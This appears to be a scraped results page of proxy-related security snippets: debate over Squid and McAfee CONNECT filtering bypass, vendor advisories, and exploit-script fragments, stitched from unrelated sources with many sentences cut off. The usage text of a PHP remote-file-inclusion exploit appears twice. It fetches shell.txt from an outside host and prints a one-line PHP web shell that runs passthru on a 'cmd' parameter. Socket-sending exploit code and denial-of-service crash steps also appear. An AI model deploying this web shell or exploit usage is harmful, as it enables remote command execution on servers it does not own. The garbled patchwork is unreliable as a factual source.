Next Page >>
proxy
To be clear, the CONNECT request is a single request/response cycle between the client and the proxy. Any request body is nonsensical and should be ignored by the proxy (or the request can be rejected if the proxy wants to be pedantic). There is nothing that explicitly disallows inclusion of the host header in a CONNECT request. Granted, including the host header incurs some degree of ambiguity (the FQDN may resolve to the IP address, but the IP address is not guaranteed to resolve to the FQDN), but this is clearly a debatable choice on the developer's part as to whether it should be used to determine traffic policy applicability for this request.
The proxy should only ignore further data between the client and remote if the proxy successfully established a TCP connection between them on the specified destination port.
IOW, if the client sends a CONNECT request that the proxy policy allows, the proxy should either queue or reject further communication from the client until the TCP connection has been successfully established and the proxy has responded to the client with "HTTP 200".
If the connection attempt fails, the proxy should provide an HTTP error response to the client and close the client-to-proxy connection.
Likewise, while the proxy does establish the end-to-end TCP connection between the client and upstream server, it is not responsible for any part of the encryption that may be involved in that communication - unless it specifically offers a "trusted MitM" feature such as TMG HTTPS Inspection or Juniper SSL Forward Proxy (other vendors have similar features).
Also, whether the McAffee proxy allows translating normal HTTP methods to CONNECT, then tunneling them to the upstream proxy is irrelevant to the question of whether the local proxy actually uses the host header or the host portion of the CONNECT request to determine policy applicability.
following features is affected:
* Secure Socket Layer Virtual Private Network (SSL VPN)
* When the affected device is configured to accept Cisco Adaptive
Security Device Manager (ASDM) connections
* TLS Proxy for Encrypted Voice Inspection
* Cut-Through Proxy for Network Access when using HTTPS
SSL VPN (or WebVPN) is enabled with the "enable <interface name>"
command in "webvpn" configuration mode. SSL VPN is disabled by default.
The following configuration snippet provides an example of a SSL VPN
Oracle is a widely-deployed Database Management System (DBMS) that supports a variety of applications. Many multi-tier applications are designed to use proxy authentication, restricting a middle tier to establish the database connection on behalf of the users. The standard authentication mechanism requires the client, the middle tier in this case, to provide valid credentials in order to authenticate and connect to the DBMS. User sessions are then created through the proxy connection. Oracle TNS protocol messages are used for session setup, authentication and data transfer.
Scope
Imperva’s Application Defense Center (ADC) conducts extensive research on enterprise applications and databases. During its research, the team has identified a vulnerability in Oracle’s proxy authentication and access control mechanism.
Findings
What I understand from the advisory is the Squid proxy is basing its
filtering on the Host header when present, even for the CONNECT
command which doesn't allow this header at all as it makes no sense. I
haven't confirmed the bug but what's being described is definitely a
vulnerability.
There's also a small misconception in what you said. The proxy will
see the entire CONNECT request, headers and all - after the request
headers there'll be a pair of newlines, and only *then* the remaining
data is tunneled transparently. So it's the second request's headers
In McAfee Web Gateway it is possible to convert GET methods in CONNECT
methods, and after the connection, send the same get packet, without
modification and without cryptography. Even with the get packets
passing through the proxy without cryptography and with the Host field
pointing to a filtered site, the proxy will accept.
I think it is a vulnerability!
See my python code.
Thanks
The PIX and ASA security appliances are also affected by a crafted TLS
packet vulnerability that affects devices running certain 7.x software
versions if the software has one or more features configured that cause
TLS sessions to terminate on the PIX or ASA security appliance. These
functions include, but are not limited to, clientless WebVPN, HTTPS
management, cut-through proxy for network access, and TLS proxy for
encrypted voice inspection. Version 6.3.x is not affected. Features that
cause TLS sessions to terminate on the PIX and ASA security appliances
are not enabled by default. For specific affected versions, please refer
to the "Software Versions and Fixes" section.
3proxy ( http://3proxy.ru/ ) is multi-platform (Windows, Linux, Unix)
multi-protocol proxy server with abilities to mange traffic flows and
bandwidths, convert requests between different proxy types,
authenticate, authorize, control, limit and account users access and
more.
3proxy 0.5.3j version was released, to address double free()
vulnerability in FTP proxy module (ftppr) reported by Venustech AD-LAB
(CVE-2007-5622). Vulnerable 3proxy versions are 0.5 - 0.5.3i. Current
A forward proxy server when presented with a CONNECT request is solely responsible for attempting to facilitate an end-to-end encrypted path between the requesting client and the far end server. The CONNECT method does no more than create a temporary hole in your firewall.
Only once that is done is a normal HTTP request, including headers such as the Host: header, passed over the encrypted path by the client. Most crucially, the proxy server cannot see the HTTP request or its headers due to the end-to-end encryption. You can use the encrypted path to carry any protocol or data you like and the proxy server is quite oblivious to it as it is opaque to the proxy.
The only access control that the proxy server can perform is based on the CONNECT method request and the server identified in it by either IP number or FQDN and port.
You do not say what the acl is that you have asked Squid to apply but it cannot involve any examination of the Host: header of a request if the CONNECT method is used; only the far end server can see that.
The same conclusion also applies to your other post about a vulnerability with "McAfee Web Gateway URL Filtering Bypass"
The Cisco Firewall Services Module (FWSM) for the Cisco Catalyst 6500
Series switches and Cisco 7600 Series routers is affected by the
following vulnerabilities:
* Syslog Message Memory Corruption Denial of Service Vulnerability
* Authentication Proxy Denial of Service Vulnerability
* TACACS+ Authentication Bypass Vulnerability
* Sun Remote Procedure Call (SunRPC) Inspection Denial of Service
Vulnerabilities
* Internet Locator Server (ILS) Inspection Denial of Service
Vulnerability
The following list contains some of the applications within the Cisco
ASA and Cisco PIX devices that use TLS:
* Clientless WebVPN, SSL VPN Client, and AnyConnect Connections
* ASDM (HTTPS) Management Sessions
* Cut-Through Proxy for Network Access
* TLS Proxy for Encrypted Voice Inspection
Clientless WebVPN, SSL VPN Client, and AnyConnect Connections
+------------------------------------------------------------
</font><input type="file" name="datafile" size="40"><font
color="#FF0000"> * </font>
<p><font color="#00ff00" > specify a port (default is 80):
</font><input name="port" size="20"><span
class="Stile5"></span></p>
<p><font color="#00ff00" > Proxy (ip:port):
</font><input name="proxy" size="20"><span
class="Stile5"></span></p>
<p align="center"> <span class="Stile5"><font
color="#FF0000">* </font><font color="white" >fields are
required</font></font></span></p>
SEC Consult Security Advisory < 20090429-0 >
=======================================================================
title: Proxy bypass vulnerability & plain text passwords
in LevelOne AMG-2000
product: LevelOne AMG-2000 Wireless AP Management Gateway
vulnerable version: Firmware <=2.00.00build00600
impact: critical
homepage: http://www.level1.com
found: 2008-12-16
by: J. Greil / SEC Consult / www.sec-consult.com
upload: </font></br><input type="file" name="datafile"
size="40"><font color="#FF0000"> * </font>
<p><font color="#FFF8C6" > specify a port (default is 80):
</font></br><input name="port" size="20"><span
class="Stile5"></span></p>
<p><font color="#FFF8C6" > Proxy (ip:port):
</font></br><input name="proxy" size="20"><span
class="Stile5"></span></p>
<p align="center"> <span class="Stile5"><font
color="#FF0000">* </font><font color="white" >fields are
required</font></font></span></p>
RIP Denial of Service Vulnerability
+----------------------------------
A denial of service vulnerability affects the RIP implementation in
Cisco ASA 5500 Series Adaptive Security Appliances when both RIP and
the Cisco Phone Proxy feature are enabled on the same device. The
following example displays an affected configuration (Cisco ASA
Software version 8.0 and 8.1):
router rip
...
host: script server (ip/hostname)
shell: path to shell
cmd: a shell command (ls -la)
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost http://www.site.com/shell.txt ls -la -P1.1.1.1:80
shell.txt: <?php ob_clean();echo"iLker Kandemir www.mefistolabs.com";ini_set("max_execution_time",0);echo "mefistolabs";passthru($_GET["cmd"]);die;?>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
');
> host: script server (ip/hostname)
> shell: path to shell
> cmd: a shell command (ls -la)
> Options:
> -p[port]: specify a port other than 80
> -P[ip:port]: specify a proxy
> Example:
> php '.$argv[0].' localhost http://www.site.com/shell.txt ls -la -P1.1.1.1:80
> shell.txt: <?php ob_clean();echo"iLker Kandemir
> www.mefistolabs.com";ini_set("max_execution_time",0);echo
> "mefistolabs";passthru($_GET["cmd"]);die;?>
Title: at32 Reverse Proxy - Multiple HTTP Header Field Denial Of Service Vulnerability
Product : at32 Reverse Proxy
Version : v1.060.310
Vendor: http://www.at32.com/doc/rproxy.htm
Class: Boundary Condition Error
____________________________________________________________________________
Overview:
--------
Part of the Alcatel Omnivista 4760 administration software of the Alcatel
4400 PBX is an HTTP proxy. It is used to tunnel ssh-connections to the
ssh-ports
of the PBX within the internal network.
This proxy is vulnerable to a remote buffer overflow.
Description:
The latest default configuration of Squid blocks CONNECT methods for
all ports but 443. McAfee allows CONNECT for 80 and 443.
So the tests I made with Host header works ONLY for McAfee Web Gateway
and the translation of GET methods to CONNECT methods will work ONLY
for McAfee, because Squid blocks CONNECT for port 80. But, if the
proxy allows this kind of connection, the proxy can be vulnerable (for
translation of the HTTP methods) .
Sorry for the misunderstanding.
SSL CONNECT Translation Attack (Hostname to IP address):
McAfee Web Gateway 7: Vulnerable
Name: Mod_proxy from apache 1.3 - Integer overflow which causes heap overflow.
Author: Adam Zabrocki (<pi3@itsec.pl> or <zabrocki@cern.ch>)
Date: Jan 27, 2010
Issue:
Mod_proxy from apache 1.3.xx (tested on latest version - 1.3.41) allows local and remote attackers
to overflow buffer on heap via integer overflow vulnerability.
* CONTACT: gmdarkfig@gmail.com (french / english)
* GREETZ: Sparah, Ddx39
*
* DESCRIPTION:
* The phpsploit is a class implementing a web user agent.
* You can add cookies, headers, use a proxy server with (or without) a
* basic authentification. It supports the GET and the POST method. It can
* also be used like a browser with the cookiejar() function (which allow
* a server to add several cookies for the next requests) and the
* allowredirection() function (which allow the script to follow all
* redirections sent by the server). It can return the content (or the
I. BACKGROUND
Sun Microsystems Inc's Java System is a collection of server
applications bundled together. One such server application included is
the Web Proxy Server. This software implements proxy services including
HTTP and SOCKSv5.
For more information, visit
http://www.sun.com/software/products/web_proxy/home_web_proxy.xml.
____________________________________________________________________________
Overview:
--------
Part of the Alcatel Omnivista 4760 administration software of the Alcatel
4400 PBX is an HTTP proxy. It is used to tunnel ssh-connections to the
ssh-ports
of the PBX within the internal network.
This proxy is vulnerable to a remote buffer overflow.
Description:
The FTP proxy used in Apple's Airport Express, Airport Extreme, Time Capsule and possibly elsewhere doesn't check the client provided address and port given by the FTP PORT command against the IP address of the connecting client, or against the use of privileged ports. (The FTP PORT command is used by a FTP client to tell an FTP server which address and data port to initiate the data connection on.) The FTP proxy is used to provide assistance to clients operating in NAT environments served by the Apple products. FTP servers running behind a NAT with this assistance can have addresses in the command channel rewritten for them so that external clients can reach them when operating in passive mode. The ALG operates as a proxy server, assuming responsibility for connections to the FTP server, and must therefore also handle and modify rewriting of the PORT command. It looks like it might be ftp-proxy from PF.
The effect of this problem is to allow anybody with access to the FTP port forwarded on the exterior side of an Apple Airport product that offers NAT to internal clients, which for a publicly-accessible FTP server is the big bad world, to induce an FTP server operating behind a NAT to send data to arbitrary addresses and ports. This is true even if the FTP server is configured to operate more securely, since it sees connections from the NAT's exterior interface, not the connecting client. This is useful for bouncing anonymous port scans off the victim NAT, or if data is available or can be written to and then read from the FTP server, potentially for anonymous attacks, spam, news floods, and other such badness. Any trust relationship and/or security implied or assumed by a NAT is also gone, since the PORT command can also specify private addresses, inside the NAT, for victimisation. Best of all, the gateway itself makes no log entry concerning FTP connections that have been run through the proxy.
Workarounds: do not use FTP; do not trigger the use of the ALG (FTP proxy) by explicitly using ports other than 21 on the inbound port mapping. If you can't do those things, you can avoid the worst effects of this attack by disabling FTP uploads that can later be downloaded by anonymous users.
Apple likes to keep secrets for the protection of its customers. Since the reasonable release of this advisory removes that protection, confidential information vouchsafed to me can be safely disclosed with no ill effects. Apple has a fix, and according to its last seemingly automatic template message, they are still testing it and do not know precisely when it will be released. This is confidential information. DO NOT DISCLOSE!
Advisory history:
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
telnet server on vulnerable phones. This vulnerability is
corrected in SIP firmware version 8.8(0). This vulnerability is
documented in CVE-2008-0529 leavingcisco.com and Cisco Bug ID
CSCsj78359.
* SIP Proxy Response Overflow
Cisco Unified IP Phone 7940, 7940G, 7960 and 7960G devices
running SIP firmware contain a heap overflow vulnerability in the
handling of a challenge/response message from a SIP proxy. If an
attacker controls the SIP proxy to which a vulnerable phone is
Crashing ZoneAlarm 8.0.020.000 by Checkpoint (Component : TrueVector)
==========================================
- Keep ZoneALarm 8 running with vsmon.exe running (which runs by default)
- On System A : Run the rogue proxy (attached) za_crasher_proxy.exe and set a port number (eg: za_crasher_proxy.exe 5938)
- On System B : Use Internet Explorer 6 and set proxy settings as IP of System A and port 5938 for HTTP connections
By default IE 6 has homepage as
http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
Leave it unchanged.
On 17/04/2012 10:11 a.m., Gabriel Menezes Nunes wrote:
> # Exploit Title: Squid URL Filtering Bypass
> # Date: 16/04/2012
> # Author: Gabriel Menezes Nunes
> # Version: Squid Proxy
> # Tested on: Squid Proxy 3.1.19
> # CVE: CVE-2012-2213
>
>
> I found a vulnerability in Squid Proxy that allows access to filtered sites.
have hit it by now especially on networks that have their IP address
allocated dynamically.
So Probability of this being the reason: Very Low
2. AT&T is using a proxy caching server and the authentication cookies
used by Facebook was stored on the proxy server.
If a proxy server was being used by AT&T then when a request went out to
Facebook it would check for a valid session using the server’s IP
address and then check for an authentication cookie on that server. If
* Jonathan Peatfield reported that the "Options=IncludesNoEXEC"
argument to the "AllowOverride" directive is not processed properly
(CVE-2009-1195).
* Sander de Boer discovered that the AJP proxy module (mod_proxy_ajp)
does not correctly handle POST requests that do not contain a request
body (CVE-2009-1191).
* The vendor reported that the HTTP proxy module (mod_proxy_http),
when being used as a reverse proxy, does not properly handle requests
Next Page>>
|
